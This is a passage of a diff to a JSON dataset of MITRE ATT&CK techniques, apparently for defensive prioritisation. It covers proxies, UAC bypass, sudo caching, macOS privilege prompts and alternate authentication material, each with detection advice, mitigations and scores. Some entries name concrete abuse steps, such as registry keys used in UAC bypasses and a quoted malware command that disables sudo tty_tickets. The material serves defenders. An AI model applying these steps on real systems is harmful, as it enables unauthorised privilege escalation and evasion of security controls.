-                "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.",
-                "detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
-            },
-            {
-                "tid": "T1090.002",
-                "name": "Proxy: External Proxy",
-                "url": "https://attack.mitre.org/techniques/T1090/002",
-                "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
-                "detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    }
-                ]
-            },
-            {
-                "tid": "T1090.003",
-                "name": "Proxy: Multi-hop Proxy",
-                "url": "https://attack.mitre.org/techniques/T1090/003",
-                "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.",
-                "detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
-            },
-            {
-                "tid": "T1090.004",
-                "name": "Proxy: Domain Fronting",
-                "url": "https://attack.mitre.org/techniques/T1090/004",
-                "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.",
-                "detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
-                "mitigations": [
-                    {
-                        "mid": "M1020",
-                        "name": "SSL/TLS Inspection",
-                        "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
-                        "url": "https://attack.mitre.org/mitigations/M1020"
-                    }
-                ]
-            }
+            "Command: Command Execution",
+            "File: File Metadata",
+            "File: File Modification"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1548",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1020",
-                "name": "SSL/TLS Inspection",
-                "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
-                "url": "https://attack.mitre.org/mitigations/M1020"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 1.3928571428571428,
-        "adjusted_score": 1.3928571428571428,
-        "has_car": false,
+        "cumulative_score": 0.5238095238095237,
+        "adjusted_score": 0.5238095238095237,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "4.2",
-            "4.4",
-            "9.3",
-            "13.3",
-            "13.4",
-            "13.8"
+            "4.1",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-3",
-            "AC-4",
-            "CA-7",
-            "CM-2",
             "CM-6",
             "CM-7",
-            "SC-7",
-            "SC-8",
-            "SI-10",
-            "SI-15",
-            "SI-3",
             "SI-4"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.24285714285714285,
-            "mitigation_score": 0.32727272727272727,
-            "detection_score": 0.15
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1091",
-        "name": "Replication Through Removable Media",
-        "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
-        "url": "https://attack.mitre.org/techniques/T1091",
+        "tid": "T1548.002",
+        "name": "Abuse Elevation Control Mechanism: Bypass User Account Control",
+        "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
+        "url": "https://attack.mitre.org/techniques/T1548/002",
         "tactics": [
-            "Initial Access",
-            "Lateral Movement"
+            "Defense Evasion",
+            "Privilege Escalation"
         ],
-        "detection": "Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.",
+        "detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
-            "Drive: Drive Creation",
-            "File: File Access",
-            "File: File Creation",
-            "Process: Process Creation"
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Process: Process Metadata",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1548",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             },
             {
-                "mid": "M1034",
-                "name": "Limit Hardware Installation",
-                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
-                "url": "https://attack.mitre.org/mitigations/M1034"
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
             }
         ],
-        "cumulative_score": 0.4583702366666667,
-        "adjusted_score": 0.4583702366666667,
+        "cumulative_score": 0.5190476190476191,
+        "adjusted_score": 0.5190476190476191,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [
-            "2.3",
-            "2.5",
             "4.1",
-            "7.7",
-            "10.3",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
+            "AC-2",
             "AC-3",
+            "AC-5",
             "AC-6",
+            "CA-8",
             "CM-2",
+            "CM-5",
             "CM-6",
-            "CM-8",
-            "MP-7",
+            "IA-2",
             "RA-5",
-            "SC-41",
-            "SI-3",
+            "SI-2",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.16666666666666669,
-            "mitigation_score": 0.3090909090909091,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.19170357
+        "hardware_coverage": false
     },
     {
-        "tid": "T1092",
-        "name": "Communication Through Removable Media",
-        "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
-        "url": "https://attack.mitre.org/techniques/T1092",
+        "tid": "T1548.003",
+        "name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching",
+        "description": "Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.",
+        "url": "https://attack.mitre.org/techniques/T1548/003",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion",
+            "Privilege Escalation"
         ],
-        "detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.",
+        "detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
         "platforms": [
             "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Drive: Drive Access",
-            "Drive: Drive Creation"
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Process: Process Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1548",
         "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
             {
                 "mid": "M1028",
                 "name": "Operating System Configuration",
                 "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
                 "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.24285714285714285,
-        "adjusted_score": 0.24285714285714285,
+        "cumulative_score": 0.3047619047619048,
+        "adjusted_score": 0.3047619047619048,
         "has_car": false,
         "has_sigma": false,
-        "has_es_siem": false,
+        "has_es_siem": true,
         "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.5",
+            "3.3",
             "4.1",
-            "4.8",
-            "10.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "CM-8",
-            "MP-7",
+            "IA-2",
             "RA-5",
-            "SI-3",
             "SI-4"
         ],
-        "process_coverage": false,
+        "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.14285714285714285,
-            "mitigation_score": 0.2727272727272727
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1095",
-        "name": "Non-Application Layer Protocol",
-        "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)\n Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
-        "url": "https://attack.mitre.org/techniques/T1095",
+        "tid": "T1548.004",
+        "name": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt",
+        "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)",
+        "url": "https://attack.mitre.org/techniques/T1548/004",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion",
+            "Privilege Escalation"
         ],
-        "detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.",
+        "detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
         "platforms": [
-            "Linux",
-            "Network",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Process: OS API Execution",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1548",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             }
         ],
-        "cumulative_score": 1.4119047619047618,
-        "adjusted_score": 1.4119047619047618,
+        "cumulative_score": 0.3,
+        "adjusted_score": 0.3,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "4.2",
-            "4.4",
-            "4.5",
-            "7.6",
-            "7.7",
-            "12.2",
-            "12.8",
-            "13.3",
-            "13.4",
-            "13.8",
-            "18.2",
-            "18.3",
-            "13.10"
+            "2.5"
         ],
         "nist_controls": [
-            "AC-3",
-            "AC-4",
-            "CA-7",
             "CM-2",
             "CM-6",
             "CM-7",
-            "SC-7",
-            "SI-10",
-            "SI-15",
+            "CM-8",
+            "SC-18",
+            "SC-34",
+            "SI-12",
+            "SI-16",
             "SI-3",
-            "SI-4"
+            "SI-4",
+            "SI-7"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
+        "process_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2619047619047619,
-            "mitigation_score": 0.43636363636363634,
-            "detection_score": 0.07
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1098",
-        "name": "Account Manipulation",
-        "description": "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.",
-        "url": "https://attack.mitre.org/techniques/T1098",
+        "tid": "T1550",
+        "name": "Use Alternate Authentication Material",
+        "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
+        "url": "https://attack.mitre.org/techniques/T1550",
         "tactics": [
-            "Persistence"
+            "Defense Evasion",
+            "Lateral Movement"
         ],
-        "detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
+        "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
         "platforms": [
-            "Azure AD",
             "Google Workspace",
             "IaaS",
-            "Linux",
             "Office 365",
-            "Windows",
-            "macOS"
+            "SaaS",
+            "Windows"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Object Modification",
-            "Command: Command Execution",
-            "File: File Modification",
-            "Group: Group Modification",
-            "Process: Process Creation",
-            "User Account: User Account Modification"
+            "Active Directory: Active Directory Credential Request",
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Creation",
+            "User Account: User Account Authentication",
+            "Web Credential: Web Credential Usage"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1098.001",
-                "name": "Account Manipulation: Additional Cloud Credentials",
-                "url": "https://attack.mitre.org/techniques/T1098/001",
-                "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nAdversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)",
